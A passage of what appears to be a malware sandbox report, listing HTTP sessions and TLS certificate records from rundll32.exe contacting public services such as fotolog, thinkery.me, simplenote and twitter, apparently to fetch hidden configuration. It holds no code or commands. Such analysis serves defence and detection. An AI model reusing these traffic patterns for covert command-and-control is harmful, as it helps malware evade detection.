                                                                                                                                                95192.168.2.649964172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:40.436561108 CET7482OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:45:40.968020916 CET7483INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:40 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:45:40 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d8487fc00000b80d4915000000001
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=pb%2FaXFLoPCJ%2BPb4b%2F8mtwi%2F6w1lPJy9uNVUuGqcLSb1UJAW4vCsA3au9qVRnIy118%2F4usWL9TciQeApZ5zgXBXQD2TpSxhRREXWTcWKNBQA%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3d1ffc2e0b80-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                96192.168.2.6499665.9.110.8480C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:42.089268923 CET7530OUTGET /billywilliams/5a0170161cb602262f000d2c HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: thinkery.me
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:42.160487890 CET7530INHTTP/1.1 302 Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:42 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://thinkery.me/billywilliams/5a0170161cb602262f000d2c
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                97192.168.2.649968192.0.84.24780C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:42.930828094 CET7541OUTGET /publish/pBn8Jt HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: simp.ly
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:43.100358009 CET7542INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:43 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 138
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Location: https://app.simplenote.com/publish/pBn8Jt
                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                98192.168.2.649970104.244.42.180C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:43.723304987 CET7551OUTGET /np8j7ovqdl HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: twitter.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Feb 22, 2021 23:45:43.892555952 CET7551INHTTP/1.1 301 Moved Permanently
                                                                                                                                                cache-control: no-cache, no-store, max-age=0
                                                                                                                                                content-length: 0
                                                                                                                                                date: Mon, 22 Feb 2021 22:45:43 GMT
                                                                                                                                                location: https://twitter.com/np8j7ovqdl
                                                                                                                                                server: tsa_f
                                                                                                                                                set-cookie: personalization_id="v1_J5jH7EqIWgpLmj/3n0aCkQ=="; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:43 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                set-cookie: guest_id=v1%3A161403394382359456; Max-Age=63072000; Expires=Wed, 22 Feb 2023 22:45:43 GMT; Path=/; Domain=.twitter.com; Secure; SameSite=None
                                                                                                                                                x-connection-hash: 349408e7873a0615ad10f410c57452b0
                                                                                                                                                x-response-time: 109


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                99192.168.2.649973172.67.204.15680C:\Windows\System32\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                Feb 22, 2021 23:45:44.726264000 CET7563OUTGET /vz1g3wmwu HTTP/1.1
                                                                                                                                                Accept: text/html, application/xhtml+xml, */*
                                                                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.4; InfoPath.2; SV1; .NET CLR 3.3.69573; WOW64; en-US)
                                                                                                                                                Host: www.fotolog.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Cookie: __cfduid=d16784b15f2ba7456290599dc38431f151614033840
                                                                                                                                                Feb 22, 2021 23:45:45.150612116 CET7564INHTTP/1.1 301 Moved Permanently
                                                                                                                                                Date: Mon, 22 Feb 2021 22:45:45 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                Expires: Mon, 22 Feb 2021 23:45:44 GMT
                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                X-Redirect-By: WordPress
                                                                                                                                                Location: https://www.fotolog.com/vz1g3wmwu
                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                cf-request-id: 086d8498be00001f906238a000000001
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ZTaVZUFXknzNya2wuGpT6p%2FcD1PidW6Juhr2roMhjNxfKaYn0tkIlIrh1I%2FXMjheRm9wSk9BZfjhtFtGg25jP5SKrWDUCcqcjOIHJVqk0mc%3D"}],"max_age":604800,"group":"cf-nel"}
                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 625c3d3ac89a1f90-AMS
                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                HTTPS Packets

                                                                                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                Feb 22, 2021 23:43:57.426296949 CET5.9.110.84443192.168.2.649717CN=thinkery.me CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Thu Jan 07 20:06:55 CET 2021 Wed Oct 07 21:21:40 CEST 2020Wed Apr 07 21:06:55 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                Feb 22, 2021 23:43:58.701847076 CET216.239.32.21443192.168.2.649721CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:43:59.574203968 CET104.244.42.1443192.168.2.649724CN=twitter.com, OU=lon3, O="Twitter, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Mar 26 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013Thu Mar 25 13:00:00 CET 2021 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                Feb 22, 2021 23:44:00.028131962 CET104.244.42.70443192.168.2.649725CN=mobile.twitter.com, OU=lon3, O="Twitter, Inc.", L=San Francisco, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USThu Mar 26 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013Thu Mar 25 13:00:00 CET 2021 Sun Oct 22 14:00:00 CEST 2028771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=USTue Oct 22 14:00:00 CEST 2013Sun Oct 22 14:00:00 CEST 2028
                                                                                                                                                Feb 22, 2021 23:44:01.027015924 CET172.67.204.156443192.168.2.649728CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jul 17 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Sat Jul 17 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                Feb 22, 2021 23:44:03.434411049 CET216.239.32.21443192.168.2.649735CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:44:07.694622040 CET216.239.32.21443192.168.2.649747CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:44:12.263869047 CET216.239.32.21443192.168.2.649756CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:44:16.977216959 CET216.239.32.21443192.168.2.649765CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:44:21.192775011 CET216.239.32.21443192.168.2.649774CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:44:25.116133928 CET216.239.32.21443192.168.2.649785CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:44:34.713398933 CET216.239.32.21443192.168.2.649803CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:44:42.835371017 CET216.239.32.21443192.168.2.649827CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:44:52.364649057 CET216.239.32.21443192.168.2.649856CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:45:00.659852982 CET216.239.32.21443192.168.2.649874CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:45:04.732250929 CET216.239.32.21443192.168.2.649883CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:45:08.725895882 CET216.239.32.21443192.168.2.649892CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:45:13.334218025 CET216.239.32.21443192.168.2.649901CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:45:17.384579897 CET216.239.32.21443192.168.2.649910CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:45:26.394093990 CET216.239.32.21443192.168.2.649929CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:45:30.966487885 CET216.239.32.21443192.168.2.649939CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:45:35.023065090 CET216.239.32.21443192.168.2.649951CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
                                                                                                                                                Feb 22, 2021 23:45:39.029844046 CET216.239.32.21443192.168.2.649960CN=app.simplenote.com CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GTS CA 1D2, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Mon Jan 25 18:37:07 CET 2021 Thu Jun 15 02:00:42 CEST 2017Sun Apr 25 19:37:07 CEST 2021 Wed Dec 15 01:00:42 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                CN=GTS CA 1D2, O=Google Trust Services, C=USCN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2Thu Jun 15 02:00:42 CEST 2017Wed Dec 15 01:00:42 CET 2021
